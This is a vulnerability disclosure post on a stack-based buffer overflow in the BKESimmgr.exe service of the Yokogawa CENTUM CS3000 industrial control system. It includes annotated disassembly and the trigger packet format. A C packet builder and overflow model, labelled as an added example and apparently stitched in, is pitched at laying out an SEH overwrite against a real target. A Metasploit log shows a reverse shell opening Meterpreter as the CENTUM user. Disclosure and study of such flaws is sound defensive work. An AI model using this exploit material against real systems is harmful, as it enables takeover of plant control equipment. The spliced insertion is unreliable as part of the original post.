Last March 8th, @julianvilas and I spoke at RootedCON about our work on the Yokogawa CENTUM CS3000 product, and on March 10 we disclosed three of the vulnerabilities we found on this blog. As noted in the talk, we intended to release information about all of the vulnerabilities we had found in the product at that time. Today, after some negotiation with Yokogawa and ICS-CERT, we're disclosing another of the discovered vulnerabilities, this one in a network service that runs by default in a CENTUM CS3000 installation. The vendor asked for some extra time to assess and address this vulnerability, which is why the disclosure schedule slipped a little this time.

For all of you who weren't able to attend RootedCON, we're going just to quote the Yokogawa description of their own product in order to introduce it: "Yokogawa released CENTUM CS 3000 R3 in 1998 as the first Windows-based production control system under our brand. For over 10 years of continuous developments and enhancements, CENTUM CS 3000 R3 is equipped with functions to make it a matured system. With over 7600 systems sold worldwide, it is a field-proven system with 99.99999% of availability."

Vulnerability Summary

The Yokogawa Centum CS3000 solution uses several services in order to provide its functionality. The "BKESimmgr.exe" service, started automatically at system startup by default, listens on TCP/34205. By sending a specially crafted packet to TCP/34205 it is possible to trigger a stack-based buffer overflow that allows execution of arbitrary code with the privileges of the CENTUM user.

Disclosure Timeline

Date          Description
Dec 27, 2013  Initial disclosure to the vendor, Yokogawa
Jan 13, 2014  Disclosure to CERT/CC
Jan 14, 2014  CERT/CC assigns VU#479196 and forwards details to JPCERT
Feb 03, 2014  CERT/CC confirms JPCERT and ICS-CERT are coordinating the vulnerabilities.
              ICS-CERT tracking #: ICS-VU-205881
              JPCERT tracking #: JVNVU#98181377, JPECERT#98191377
Mar 06, 2014  Yokogawa and ICS-CERT ask for an extension for R7-2013-19.2 (this vulnerability)
May 09, 2014  Metasploit module published in Pull Request #3344

Technical Analysis

The vulnerability exists in the function sub_409310 (IDA notation). This function tries to extract data (probably strings) from a packet sent by the user, but it copies user-controlled data into a fixed-size (64-byte) stack buffer with a memcpy-like sequence and no length check:

.text:00409360 loc_409360:                            ; CODE XREF: get_string_sub_409310+42j
.text:00409360                mov    ecx, 10h
.text:00409365                xor    eax, eax
.text:00409367                lea    edi, [esp+50h+var_40]
.text:0040936B                add    esi, edx
.text:0040936D                rep stosd              ; init var_40 with 0x0 (16 dwords = 64 bytes)
.text:0040936F                mov    ecx, ebx        ; The memcpy length comes from user controlled data
.text:00409371                lea    edi, [esp+50h+var_40] ; destination, var_40 (0x40 bytes buffer)
.text:00409375                mov    edx, ecx
.text:00409377                lea    eax, [esp+50h+var_40]
.text:0040937B                shr    ecx, 2          ; divides the size by 4 because it's using rep movsd, where every movsd copies a double word (4 bytes)
.text:0040937E                rep movsd              ; esi pointing to user controlled data from the packet, leading to overflow

The above assembly chunk translates, roughly, to:

char dst[64];
memset(dst, 0, 64);                       /* rep stosd, 16 dwords */
memcpy(dst, user_data, user_length & ~3); /* rep movsd, user_length >> 2 dwords */

Where user_data and user_length are user-controlled values taken from the packet. Because the count is shifted right by two before the rep movsd, the number of bytes copied is user_length rounded down to a multiple of 4; nothing compares that count against the 64 bytes available in dst.

Exploitation

It is possible to reach the vulnerable copy by sending a specially crafted packet to TCP/34205. According to our understanding, the packet has the following format:

Field   Length
Header  6 bytes
Data    Length specified in the header

Where the header structure is:

Field        Length
Identifier   4 bytes
Data Length  2 bytes

A packet with identifier 0x1 in the header can be used to trigger the vulnerability. For this packet, the data structure is:

Field        Length
Identifier   4 bytes
Data Length  2 bytes
Data         Data Length bytes

A packet with 0x1 as the Identifier in both the Header and the Data reaches the vulnerable function; the Data Length and Data fields of the inner structure are what trigger the buffer overflow.
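The framing described above and the copy from the Technical Analysis section, modelled together in C as an added example (this is not the post's code and not the Metasploit module): build_packet emits Header{Identifier, Data Length} followed by Data{Identifier, Data Length, Data}, and copy_string replays the memset/rep movsd sequence into a scratch array that stands in for the stack, once as the service does it and once with the length check it lacks. The post gives the field widths and the 64-byte buffer but not the byte order, which is assumed little-endian here; the scratch array, the 'A' payload and every function name are the example's own. With a Data Length of 200 the vulnerable path writes 200 bytes into the 64-byte buffer (136 past its end), while 67 copies only 64 bytes because of the shr ecx, 2.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of the BKESimmgr framing and of the copy in sub_409310.
 * Field widths and the 64-byte buffer come from the post; the byte order is
 * not stated there and is ASSUMED little-endian (x86 service). Everything
 * below runs against a scratch array standing in for the stack, so the
 * overrun is measured, not triggered, on the host that runs it. */
#define HDR_LEN     6       /* identifier (4) + data length (2)            */
#define DST_SIZE    0x40    /* var_40: the 64-byte stack buffer             */
#define DST_OFFSET  0x10    /* var_40 sits at esp+50h-40h = esp+10h         */
#define STACK_MODEL 0x200   /* scratch bytes standing in for the real frame */

static void put_u16le(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void put_u32le(uint8_t *p, uint32_t v) { put_u16le(p, (uint16_t)v); put_u16le(p + 2, (uint16_t)(v >> 16)); }
static uint16_t get_u16le(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t get_u32le(const uint8_t *p) { return get_u16le(p) | ((uint32_t)get_u16le(p + 2) << 16); }

/* Header {id, len} followed by Data {id, len, bytes}; returns total size, 0 if it does not fit. */
size_t build_packet(uint8_t *out, size_t cap, uint32_t hdr_id, uint32_t data_id,
                    const uint8_t *payload, uint16_t payload_len)
{
    size_t data_len = HDR_LEN + (size_t)payload_len;   /* inner identifier + length + bytes */
    size_t total = HDR_LEN + data_len;
    if (data_len > 0xFFFF || total > cap) return 0;
    put_u32le(out, hdr_id);
    put_u16le(out + 4, (uint16_t)data_len);
    put_u32le(out + 6, data_id);
    put_u16le(out + 10, payload_len);
    memcpy(out + 12, payload, payload_len);
    return total;
}

/* The copy as the assembly does it (hardened == 0) or with a length check (hardened == 1).
 * Returns bytes written to var_40, or -1 if the packet is rejected. */
long copy_string(const uint8_t *pkt, size_t pkt_len, uint8_t *stack, int hardened)
{
    if (pkt_len < 2 * HDR_LEN) return -1;
    if (get_u32le(pkt) != 1 || get_u32le(pkt + 6) != 1) return -1;  /* both identifiers 0x1 */
    uint16_t user_length = get_u16le(pkt + 10);
    const uint8_t *user_data = pkt + 12;
    if (pkt_len < 12 + (size_t)user_length) return -1;  /* the model's own read guard */
    uint8_t *dst = stack + DST_OFFSET;
    size_t to_copy;
    if (hardened) {
        if (user_length > DST_SIZE) return -1;     /* the check the service lacks */
        to_copy = user_length;
    } else {
        to_copy = (size_t)(user_length >> 2) * 4;  /* shr ecx, 2 ; rep movsd */
        if (DST_OFFSET + to_copy > STACK_MODEL) return -1;  /* keep the scratch model in bounds */
    }
    memset(dst, 0, DST_SIZE);                      /* rep stosd with ecx = 0x10 */
    memcpy(dst, user_data, to_copy);               /* no comparison against DST_SIZE */
    return (long)to_copy;
}

/* Bytes written past the end of var_40 for a given Data Length on the vulnerable path. */
long overflow_bytes(uint16_t user_length)
{
    size_t copied = (size_t)(user_length >> 2) * 4;
    return copied > DST_SIZE ? (long)(copied - DST_SIZE) : 0;
}

/* Build a packet of payload_len 'A's (constructed input) and run it through copy_string.
 * Returns the bytes copied; *past_end gets 1 if the first byte after var_40 was overwritten. */
long run_packet(uint16_t payload_len, int hardened, int *past_end)
{
    static uint8_t payload[0x100], pkt[0x200], stack[STACK_MODEL];
    if (payload_len > sizeof payload) return -1;
    memset(payload, 'A', sizeof payload);
    memset(stack, 0, sizeof stack);
    size_t n = build_packet(pkt, sizeof pkt, 1, 1, payload, payload_len);
    if (n == 0) return -1;
    long copied = copy_string(pkt, n, stack, hardened);
    if (past_end) *past_end = stack[DST_OFFSET + DST_SIZE] == 'A';
    return copied;
}

/* 1 if the vulnerable path clobbers the byte right after var_40 for this Data Length. */
int clobbers_past_buffer(uint16_t payload_len)
{
    int past = 0;
    run_packet(payload_len, 0, &past);
    return past;
}

int main(void)
{
    int past;
    long v = run_packet(200, 0, &past);
    printf("vulnerable: copied %ld bytes, %ld past var_40, next byte clobbered=%d\n",
           v, overflow_bytes(200), past);
    printf("hardened:   result %ld (rejected)\n", run_packet(200, 1, &past));
    return 0;
}
```

Build with a C99 compiler (for example cc -std=c99 -Wall model.c) and run it; the model never executes the overwritten bytes, it only reports how far past var_40 the copy reaches, which is the number you need when laying out the SEH overwrite against a real target.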

A working exploit has been developed for Yokogawa Centum CS3000 R3.08.50 running on Windows XP SP3 and Windows 2003 SP2 (with DEP bypass), where it is possible to gain arbitrary code execution by corrupting the SEH handler stored on the stack:

msf exploit(yokogawa_bkesimmgr_bof) > exploit
[*] Started reverse handler on 192.168.172.1:4444
[*] Trying target Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3, sending 427 bytes...
[*] Sending stage (770048 bytes) to 192.168.172.192
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.192:1048) at 2013-11-17 21:17:14 -0600
meterpreter > getuid
Server username: HIS0101\CENTUM
meterpreter > sysinfo
Computer : HIS0101
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter >

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.